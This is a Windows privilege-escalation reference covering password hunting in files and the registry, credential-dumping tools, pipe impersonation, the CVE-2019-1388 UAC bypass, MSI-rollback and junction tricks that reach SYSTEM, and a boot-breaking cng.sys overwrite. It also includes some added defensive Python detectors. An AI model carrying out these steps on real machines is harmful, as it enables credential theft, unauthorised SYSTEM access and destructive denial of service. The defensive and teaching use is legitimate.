COM classes and interfaces are defined in the registry under HKEY_CLASSES_ROOT\CLSID and HKEY_CLASSES_ROOT\Interface respectively. This registry is created by merging HKEY_LOCAL_MACHINE\Software\Classes + HKEY_CURRENT_USER\Software\Classes = HKEY_CLASSES_ROOT.

Inside the CLSIDs of this registry you can find the child registry key InProcServer32, which contains a default value pointing to a DLL and a value called ThreadingModel that can be Apartment (Single-Threaded), Free (Multi-Threaded), Both (Single or Multi) or Neutral (Thread Neutral).

Basically, if you can overwrite any of the DLLs that are going to be executed, you could escalate privileges if that DLL is going to be executed by a different user.

To learn how attackers use COM Hijacking as a persistence mechanism check:

COM Hijacking

Generic Password search in files and registry

Search for file contents

cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
findstr /spin "password" *.*

Search for a file with a certain filename

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
where /R C:\ user.txt
where /R C:\ *.ini

Search the registry for key names and passwords

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S /d
REG QUERY HKCU /F "password" /t REG_SZ /S /d

Tools that search for passwords

MSF-Credentials Plugin is an msf plugin; I have created this plugin to automatically execute every metasploit POST module that searches for credentials inside the victim.
Winpeas automatically searches for all the files containing passwords mentioned in this page.
Lazagne is another great tool to extract passwords from a system.

The tool SessionGopher searches for sessions, usernames and passwords of several tools that save this data in clear text (PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP)

Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -Thorough
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss

Leaked Handlers

Imagine that a process running as SYSTEM opens a new process (OpenProcess()) with full access. The same process also creates a new process (CreateProcess()) with low privileges but inheriting all the open handles of the main process.
Then, if you have full access to the low privileged process, you can grab the open handle to the privileged process created with OpenProcess() and inject a shellcode.
Read this example for more information about how to detect and exploit this vulnerability.
Read this other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access).

Named Pipe Client Impersonation

Shared memory segments, referred to as pipes, enable process communication and data transfer.

Windows provides a feature called Named Pipes, allowing unrelated processes to share data, even over different networks. This resembles a client/server architecture, with roles defined as named pipe server and named pipe client.

When data is sent through a pipe by a client, the server that set up the pipe has the ability to take on the identity of the client, assuming it has the necessary SeImpersonate rights. Identifying a privileged process that communicates via a pipe you can mimic provides an opportunity to gain higher privileges by adopting the identity of that process once it interacts with the pipe you established. For instructions on executing such an attack, helpful guides can be found here and here.

Also the following tool allows to intercept a named pipe communication with a tool like burp: https://github.com/gabriel-sztejnworcel/pipe-intercept and this tool allows to list and see all the pipes to find privescs https://github.com/cyberark/PipeViewer

Telephony tapsrv remote DWORD write to RCE

The Telephony service (TapiSrv) in server mode exposes \pipe\tapsrv (MS-TRP). A remote authenticated client can use the mailslot-based async event path to turn ClientAttach into an arbitrary 4-byte write to any existing file writable by NETWORK SERVICE, then gain Telephony admin rights and load an arbitrary DLL as the service. Full flow:

  • ClientAttach with pszDomainUser set to a writable existing path → the service opens it via CreateFileW(..., OPEN_EXISTING) and uses it for async event writes.
  • Each event writes the attacker-controlled InitContext from Initialize to that handle. Register a line app with LRegisterRequestRecipient (Req_Func 61), trigger TRequestMakeCall (Req_Func 121), receive via GetAsyncEvents (Req_Func 0), then unregister/shutdown to repeat deterministic writes.
  • Add your name to [TapiAdministrators] in C:\Windows\TAPI\tsec.ini, reconnect, then call GetUIDllName with an arbitrary DLL path to execute TSPI_providerUIIdentify as NETWORK SERVICE.

More details:

Telephony Tapsrv Arbitrary Dword Write To Rce

Misc

File Extensions that could execute stuff in Windows

Check the page https://filesec.io/

Protocol handler / ShellExecute abuse via Markdown renderers

Clickable Markdown links passed to ShellExecuteExW can trigger dangerous URI handlers (file:, ms-appinstaller: or any registered scheme) and execute attacker-controlled files as the current user. See:

Protocol Handler Shell Execute Abuse

Monitoring Command Lines for passwords

When you get a shell as a user, there may be scheduled tasks or other processes being executed that pass credentials on the command line. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

# Snapshot the command lines of all processes, wait, snapshot again and print what changed
while($true)
{
    $process = Get-WmiObject Win32_Process | Select-Object CommandLine
    Start-Sleep 2
    $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
    Compare-Object -ReferenceObject $process -DifferenceObject $process2 -Property CommandLine
}

Stealing passwords from processes

From Low Priv User to NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass

If you have access to the graphical interface (via console or RDP) and UAC is enabled, in some versions of Microsoft Windows it is possible to run a terminal or any other process as “NT\AUTHORITY SYSTEM” from an unprivileged user.

This makes privilege escalation and a UAC bypass possible at the same time using the same vulnerability. Moreover, there is no need to install anything, and the binary used during the process is signed and issued by Microsoft.

Some of the affected systems are the following:

SERVER
======

Windows 2008r2	7601	** link OPENED AS SYSTEM **
Windows 2012r2	9600	** link OPENED AS SYSTEM **
Windows 2016	14393	** link OPENED AS SYSTEM **
Windows 2019	17763	link NOT opened


WORKSTATION
===========

Windows 7 SP1	7601	** link OPENED AS SYSTEM **
Windows 8		9200	** link OPENED AS SYSTEM **
Windows 8.1		9600	** link OPENED AS SYSTEM **
Windows 10 1511	10240	** link OPENED AS SYSTEM **
Windows 10 1607	14393	** link OPENED AS SYSTEM **
Windows 10 1703	15063	link NOT opened
Windows 10 1709	16299	link NOT opened

To exploit this vulnerability, the following steps must be performed:

1) Right click on the HHUPD.EXE file and run it as Administrator.

2) When the UAC prompt appears, select "Show more details".

3) Click "Show publisher certificate information".

4) If the system is vulnerable, when clicking on the "Issued by" URL link, the default web browser may appear.

5) Wait for the site to load completely and select "Save as" to bring up an explorer.exe window.

6) In the address path of the explorer window, enter cmd.exe, powershell.exe or any other interactive process.

7) You now will have an "NT\AUTHORITY SYSTEM" command prompt.

8) Remember to cancel setup and the UAC prompt to return to your desktop.

You have all the necessary files and information in the following GitHub repository:

https://github.com/jas502n/CVE-2019-1388

From Administrator Medium to High Integrity Level / UAC Bypass

Read this to learn about Integrity Levels:

Integrity Levels

Then read this to learn about UAC and UAC bypasses:

UAC - User Account Control

From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP

The technique is described in this blog post, with exploit code available here.

The basic attack consists of abusing the Windows Installer rollback feature to replace legitimate files with malicious ones during the uninstall process. For this, the attacker needs to create a malicious MSI installer that will be used to hijack the C:\Config.Msi folder, which will later be used by Windows Installer to store rollback files during the uninstall of other MSI packages, where the rollback files would have been modified to contain the malicious payload.

The technique, summarised, is as follows:

Stage 1 – Preparing the hijack (leave C:\Config.Msi empty)

  Step 1: Install the MSI

  • Create an .msi that installs a harmless file (for example, dummy.txt) into a writable folder (TARGETDIR).

  • Mark the installer as “UAC Compliant”, so that a non-admin user can run it.

  • Keep a handle open on the file after the install.

  Step 2: Start the uninstall

  • Uninstall that same .msi.

  • The uninstall process starts moving files to C:\Config.Msi and renaming them to .rbf files (rollback backups).

  • Poll the open file handle with GetFinalPathNameByHandle to detect when the file becomes C:\Config.Msi\<random>.rbf.

  Step 3: Custom syncing

  • The .msi includes a custom uninstall action (SyncOnRbfWritten) that:

    • Signals when the .rbf has been written.

    • Then waits on another event before continuing the uninstall.

  Step 4: Block deletion of the .rbf

  • Once signalled, open the .rbf file without FILE_SHARE_DELETE; this prevents it from being deleted.

  • Then signal back so the uninstall can finish.

  • Windows Installer fails to delete the .rbf, and because it cannot delete all the contents, C:\Config.Msi is not removed.

  Step 5: Delete the .rbf manually

  • You (the attacker) delete the .rbf file manually.

  • Now C:\Config.Msi is empty, ready to be hijacked.

At this point, trigger the SYSTEM-level arbitrary folder delete vulnerability to delete C:\Config.Msi.

Stage 2 – Replacing the rollback scripts with malicious ones

  Step 6: Recreate C:\Config.Msi with weak ACLs

  • Recreate the C:\Config.Msi folder yourself.

  • Set weak DACLs (for example, Everyone:F), and keep a handle open with WRITE_DAC.

  Step 7: Run another install

  • Install the .msi again, with:

    • TARGETDIR: a writable location.

    • ERROROUT: a variable that triggers a forced failure.

  • This install will be used to trigger the rollback again, which reads the .rbs and .rbf.

  Step 8: Monitor for the .rbs

  • Use ReadDirectoryChangesW to watch C:\Config.Msi until a new .rbs appears.

  • Capture its filename.

  Step 9: Sync before the rollback

  • The .msi has a custom install action (SyncBeforeRollback) that:

    • Signals an event when the .rbs is created.

    • Then waits before continuing.

  Step 10: Reapply the weak ACL

  • After receiving the .rbs-created event:

    • Windows Installer reapplies strong ACLs to C:\Config.Msi.

    • But since you still hold a handle with WRITE_DAC, you can reapply weak ACLs.

  ACLs are only enforced when a handle is opened, so you can still write to the folder.

  Step 11: Drop the fake .rbs and .rbf

  • Overwrite the .rbs file with a fake rollback script that tells Windows to:

    • Restore your .rbf file (the malicious DLL) into a privileged location (for example, C:\Program Files\Common Files\microsoft shared\ink\HID.DLL).

  • Drop your fake .rbf containing the malicious SYSTEM-level payload DLL.

  Step 12: Trigger the rollback

  • Signal the sync event so the installer continues.

  • A type 19 custom action (ErrorOut) is set up to fail the install on purpose at a known point.

  • This causes the rollback to start.

  Step 13: SYSTEM installs your DLL

  • Windows Installer:

    • Reads your malicious .rbs.

    • Copies your .rbf DLL into the target location.

  • Now your malicious DLL sits in a SYSTEM-loaded path.

  Final step: Execute SYSTEM code

  • Run a trusted auto-elevated binary (for example, osk.exe) that loads the hijacked DLL.

  • Boom: your code runs as SYSTEM.

From Arbitrary File Delete/Move/Rename to SYSTEM EoP

The main MSI rollback technique (the previous one) assumes you can delete a whole folder (for example, C:\Config.Msi). But what if your vulnerability only allows arbitrary file deletion?

You can exploit NTFS internals: every folder has a hidden alternate data stream called:

C:\SomeFolder::$INDEX_ALLOCATION

This stream stores the folder's index metadata.

So, if you delete the ::$INDEX_ALLOCATION stream of a folder, NTFS removes the whole folder from the filesystem.

You can do this with standard file deletion APIs such as:

DeleteFileW(L"C:\\Config.Msi::$INDEX_ALLOCATION");

Even though you are calling a file delete API, it deletes the folder itself.

From Folder Contents Delete to SYSTEM EoP

What if your primitive does not allow deleting arbitrary files/folders, but does allow deleting the contents of an attacker-controlled folder?

  Step 1: Set up a bait folder and file
  • Create: C:\temp\folder1
  • Inside it: C:\temp\folder1\file1.txt

  Step 2: Place an oplock on file1.txt
  • The oplock pauses execution when a privileged process tries to delete file1.txt.

// pseudo-code
RequestOplock("C:\\temp\\folder1\\file1.txt");
WaitForDeleteToTriggerOplock();

  Step 3: Trigger the SYSTEM process (for example, SilentCleanup)
  • This process scans folders (for example, %TEMP%) and tries to delete their contents.
  • When it reaches file1.txt, the oplock triggers and hands control to your callback.

  Step 4: Inside the oplock callback – redirect the deletion
  • Option A: Move file1.txt somewhere else
    • This empties folder1 without breaking the oplock.
    • Do not delete file1.txt directly; that would release the oplock too early.
  • Option B: Turn folder1 into a junction:

# folder1 is now a junction to \RPC Control (non-filesystem namespace)
mklink /J C:\temp\folder1 \\?\GLOBALROOT\RPC Control

  • Option C: Create a symlink in \RPC Control:

# Make file1.txt point to a sensitive folder stream
CreateSymlink("\\RPC Control\\file1.txt", "C:\\Config.Msi::$INDEX_ALLOCATION")

This targets the internal NTFS stream that stores the folder's metadata; deleting it deletes the folder.

  Step 5: Release the oplock
  • The SYSTEM process continues and tries to delete file1.txt.
  • But now, because of the junction + symlink, it is actually deleting:
C:\Config.Msi::$INDEX_ALLOCATION

Result: C:\Config.Msi is deleted by SYSTEM.

From Arbitrary Folder Create to Permanent DoS

Exploit a primitive that lets you create an arbitrary folder as SYSTEM/admin, even if you cannot write files or set weak permissions.

Create a folder (not a file) with the name of a critical Windows driver, for example:

C:\Windows\System32\cng.sys
  • This path normally corresponds to the cng.sys kernel-mode driver.
  • If you pre-create it as a folder, Windows fails to load the real driver at boot.
  • Windows then tries to load cng.sys during boot.
  • It sees the folder, fails to find the real driver, and crashes or halts the boot.
  • There is no fallback and no recovery without external intervention (for example, boot repair or disk access).

When a privileged service writes logs/exports to a path read from a writable config, redirect that path with Object Manager symlinks + NTFS mount points to turn the privileged write into an arbitrary overwrite (even without SeCreateSymbolicLinkPrivilege).

Requirements

  • The config holding the target path is writable by the attacker (for example, %ProgramData%\...\.ini).
  • The ability to create a mount point to \RPC Control and an OM file symlink (James Forshaw's symboliclink-testing-tools).
  • A privileged operation that writes data to that path (log, export, report).

Example chain

  1. Read the config to find the privileged log destination, for example SMSLogFile=C:\users\iconics_user\AppData\Local\Temp\logs\log.txt in C:\ProgramData\ICONICS\IcoSetup64.ini.
  2. Redirect the path without admin:
mkdir C:\users\iconics_user\AppData\Local\Temp\logs
CreateMountPoint C:\users\iconics_user\AppData\Local\Temp\logs \RPC Control
CreateSymlink "\\RPC Control\\log.txt" "\\??\\C:\\Windows\\System32\\cng.sys"
  3. Wait until the privileged component writes the log (for example, an admin triggers “send test SMS”). The write now lands in C:\Windows\System32\cng.sys.
  4. Inspect the deleted/replaced target (hex/PE parser) to confirm the corruption; a reboot forces Windows to load the corrupted driver path → boot-loop DoS. This also applies to any protected file that a privileged service will open for writing.

cng.sys is normally loaded from C:\Windows\System32\drivers\cng.sys, but if a copy exists in C:\Windows\System32\cng.sys it may be tried first, which makes it a reliable DoS sink for corrupted data.
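As an added defensive check (not from the original page or from any tool it references), the Python below audits the driver location discussed above: it flags a directory planted at System32\cng.sys, an unexpected file there, and a drivers\cng.sys whose contents no longer parse as a PE image. The System32 root is a parameter so the same check runs against a constructed layout in a temp directory; the minimal PE header it builds is a constructed stand-in, not a real driver.

```python
"""Audit the cng.sys load paths for a planted folder or a corrupted driver (added example)."""
from __future__ import annotations
import os
import struct
import tempfile


def looks_like_pe(data: bytes) -> bool:
    """True if data has a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def audit_driver(system32: str, name: str = "cng.sys") -> list[str]:
    """Return findings for <system32>\\<name> (shadow) and <system32>\\drivers\\<name> (real)."""
    findings = []
    shadow = os.path.join(system32, name)
    real = os.path.join(system32, "drivers", name)
    if os.path.isdir(shadow):
        findings.append(f"{shadow} is a directory (blocks loading the driver at boot)")
    elif os.path.isfile(shadow):
        findings.append(f"unexpected file at {shadow} (may be tried before drivers\\)")
    if not os.path.isfile(real):
        findings.append(f"{real} is missing")
    else:
        with open(real, "rb") as f:
            head = f.read(4096)
        if not looks_like_pe(head):
            findings.append(f"{real} is not a valid PE image (overwritten?)")
    return findings


def make_minimal_pe() -> bytes:
    """Constructed 0x80-byte blob: DOS header with e_lfanew=0x40 and a PE signature there."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr)


def demo() -> tuple[list[str], list[str]]:
    """Build a clean and a sabotaged System32 layout in a temp dir and audit both."""
    with tempfile.TemporaryDirectory() as root:
        clean = os.path.join(root, "clean")
        os.makedirs(os.path.join(clean, "drivers"))
        with open(os.path.join(clean, "drivers", "cng.sys"), "wb") as f:
            f.write(make_minimal_pe())
        bad = os.path.join(root, "bad")
        os.makedirs(os.path.join(bad, "drivers"))
        os.makedirs(os.path.join(bad, "cng.sys"))  # the planted folder from the DoS above
        with open(os.path.join(bad, "drivers", "cng.sys"), "wb") as f:
            f.write(b"garbage from a redirected log write")  # corrupted driver
        return audit_driver(clean), audit_driver(bad)


if __name__ == "__main__":
    print(demo())
```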

From High Integrity to System

New service

If you are already running in a High Integrity process, the path to SYSTEM can be as easy as creating and running a new service:

sc create newservicename binPath= "C:\windows\system32\notepad.exe"
sc start newservicename

Tip

When creating a service binary make sure it is a valid service, or that the binary performs the required actions quickly, since it will be killed after 20s if it is not a valid service.

AlwaysInstallElevated

From a High Integrity process you can try to enable the AlwaysInstallElevated registry entries and install a reverse shell using an .msi wrapper.
More information about the registry keys involved and how to install an .msi package here.

High + SeImpersonate privilege to System

You can find the code here.

From SeDebug + SeImpersonate to Full Token privileges

If you have those token privileges (you will probably find them in an already High Integrity process), you will be able to open almost any process (non-protected processes) with the SeDebug privilege, copy the token of the process, and create an arbitrary process with that token.
This technique usually picks any process running as SYSTEM with all the token privileges (yes, you can find SYSTEM processes without all the token privileges).
You can find an example of code implementing the proposed technique here.

Named Pipes

This technique is used by meterpreter to escalate in getsystem. The technique consists of creating a pipe and then creating/abusing a service to write to that pipe. Then, the server that created the pipe using the SeImpersonate privilege will be able to impersonate the token of the pipe client (the service) and obtain SYSTEM privileges.
If you want to learn more about named pipes you should read this.
If you want to read an example of how to go from high integrity to System using named pipes you should read this.

Dll Hijacking

If you manage to hijack a dll being loaded by a process running as SYSTEM you will be able to execute arbitrary code with those permissions. Therefore Dll Hijacking is also useful for this kind of privilege escalation and, moreover, it is far easier to achieve from a high integrity process since it will have write permissions on the folders used to load dlls.
You can learn more about Dll hijacking here.
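An added detection example, not code from the original page: Python that reads Service Control Manager events from the System log (7045 service installed, 7009 start timeout, 7000 service failed to start) and flags installs whose binary is an interactive program such as notepad.exe, or which are followed shortly by the timeout described in the tip above. The log lines are constructed here in a simplified timestamp|EventID|message form; the correlation window is an assumed value.

```python
"""Flag service installs that look like the 'sc create' escalation above (added example)."""
from __future__ import annotations
import re
from datetime import datetime, timedelta

# Constructed System-log extract as "<ISO timestamp>|<EventID>|<message>".
SAMPLE_LOG = r"""
2024-05-01T10:00:00|7045|A service was installed in the system. Service Name: newservicename Service File Name: C:\windows\system32\notepad.exe Service Account: LocalSystem
2024-05-01T10:00:31|7009|A timeout was reached (30000 milliseconds) while waiting for the newservicename service to connect.
2024-05-01T10:00:31|7000|The newservicename service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion.
2024-05-01T11:00:00|7045|A service was installed in the system. Service Name: VendorAgent Service File Name: "C:\Program Files\Vendor\agent.exe" Service Account: LocalSystem
"""

INSTALL_RE = re.compile(r"Service Name: (.+?) Service File Name: (.+?) Service Account: (.+)$")
FAIL_RE = re.compile(r"the (\S+) service", re.IGNORECASE)  # service name in 7000/7009 text
# Interactive programs that never register with the SCM, so the SCM kills them on start.
NON_SERVICE_BINARIES = {"notepad.exe", "cmd.exe", "powershell.exe"}


def parse(text: str) -> list[tuple[datetime, int, str]]:
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, eid, msg = line.split("|", 2)
            events.append((datetime.fromisoformat(ts), int(eid), msg))
    return events


def suspicious_installs(text: str, window_seconds: int = 60) -> list[dict]:
    """Return one finding per 7045 event that has at least one suspicious reason."""
    events = parse(text)
    window = timedelta(seconds=window_seconds)
    failures = []  # (timestamp, service name) from 7000/7009 events
    for ts, eid, msg in events:
        m = FAIL_RE.search(msg) if eid in (7000, 7009) else None
        if m:
            failures.append((ts, m.group(1)))
    findings = []
    for ts, eid, msg in events:
        m = INSTALL_RE.search(msg) if eid == 7045 else None
        if not m:
            continue
        name, path, account = m.groups()
        exe = path.strip('"').rsplit("\\", 1)[-1].lower()
        reasons = []
        if exe in NON_SERVICE_BINARIES:
            reasons.append(f"{exe} is not a service executable")
        if any(n == name and ts <= fts <= ts + window for fts, n in failures):
            reasons.append("start failure/timeout shortly after install")
        if reasons:
            findings.append({"name": name, "path": path, "account": account, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in suspicious_installs(SAMPLE_LOG):
        print(finding)
```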
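For the pipe impersonation technique (here and in the Named Pipe Client Impersonation section above), an added detection example rather than code from the page: it walks Sysmon pipe events (ID 17 pipe created, ID 18 pipe connected), flags pipe servers started from user-writable paths, and raises the severity when a process from a Windows or Program Files directory connects to such a pipe. The events are constructed in a flat key=value form using Sysmon's PipeName and Image field names.

```python
"""Spot candidate rogue named-pipe servers in Sysmon pipe events (added example)."""
from __future__ import annotations
from typing import Iterator

# Binaries under these directories are treated as trusted pipe servers.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed sample events, one per line, fields separated by '|'.
SAMPLE_EVENTS = r"""
EventID=17|PipeName=\lsass|Image=C:\Windows\System32\lsass.exe|ProcessId=712
EventID=17|PipeName=\update_svc|Image=C:\Users\bob\AppData\Local\Temp\srv.exe|ProcessId=4412
EventID=18|PipeName=\update_svc|Image=C:\Windows\System32\svchost.exe|ProcessId=900
EventID=18|PipeName=\lsass|Image=C:\Windows\System32\svchost.exe|ProcessId=900
"""


def is_trusted(image: str) -> bool:
    return image.lower().startswith(TRUSTED_DIRS)


def parse(text: str) -> Iterator[dict]:
    for line in text.splitlines():
        if line.strip():
            yield dict(kv.split("=", 1) for kv in line.split("|"))


def analyze(text: str) -> list[tuple[str, str, str, str]]:
    """Return (severity, reason, pipe, image) findings in event order."""
    findings = []
    untrusted_servers: dict[str, str] = {}  # pipe name -> image that created it
    for ev in parse(text):
        eid, pipe, image = ev["EventID"], ev["PipeName"], ev["Image"]
        if eid == "17" and not is_trusted(image):
            # A pipe server outside Windows/Program Files: if it holds SeImpersonate
            # and a privileged client connects, it can impersonate that client.
            untrusted_servers[pipe] = image
            findings.append(("medium", "pipe server started from user-writable path", pipe, image))
        elif eid == "18" and pipe in untrusted_servers and is_trusted(image):
            findings.append(("high", "trusted-path process connected to untrusted pipe", pipe, image))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(*finding)
```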

From Administrator or Network Service to System

From LOCAL SERVICE or NETWORK SERVICE to full privs

Read: https://github.com/itm4n/FullPowers

More help

Static impacket binaries

Useful tools

Best tool to look for Windows local privilege escalation vectors: WinPEAS

PS

PrivescCheck
PowerSploit-Privesc(PowerUP) – Check for misconfigurations and sensitive files (see here). Detected.
JAWS – Check for some possible misconfigurations and gather info (see here).
privesc – Check for misconfigurations
SessionGopher – Extracts saved session information for PuTTY, WinSCP, SuperPuTTY, FileZilla, and RDP. Use -Thorough locally.
Invoke-WCMDump – Extracts credentials from Credential Manager. Detected.
DomainPasswordSpray – Spray gathered passwords across the domain
Inveigh – Inveigh is a PowerShell ADIDNS/LLMNR/mDNS spoofer and man-in-the-middle tool.
WindowsEnum – Basic privesc Windows enumeration
Sherlock – Search for known privesc vulnerabilities (DEPRECATED in favour of Watson)
WINspect – Local checks (Needs Admin rights)

Exe

Watson – Search for known privesc vulnerabilities (needs to be compiled using VisualStudio) (precompiled)
SeatBelt – Enumerates the host looking for misconfigurations (more of an info-gathering tool than privesc) (needs to be compiled) (precompiled)
LaZagne – Extracts credentials from lots of software (precompiled exe in github)
SharpUP – Port of PowerUp to C#
Beroot – Check for misconfigurations (executable precompiled in github). Not recommended. Does not work well on Win10.
Windows-Privesc-Check – Check for possible misconfigurations (exe from python). Not recommended. Does not work well on Win10.

Bat

winPEASbat – Tool created based on this post (it does not need accesschk to work properly but it can use it).

Local

Windows-Exploit-Suggester – Reads the output of systeminfo and recommends working exploits (local python)
Windows Exploit Suggester Next Generation – Reads the output of systeminfo and recommends working exploits (local python)

Meterpreter

multi/recon/local_exploit_suggestor

You must compile the project using the correct version of .NET (see here). To see the .NET version installed on the victim host you can run:

C:\Windows\microsoft.net\framework\v4.0.30319\MSBuild.exe -version #Compile the code with the version given in "Build Engine version" line

References
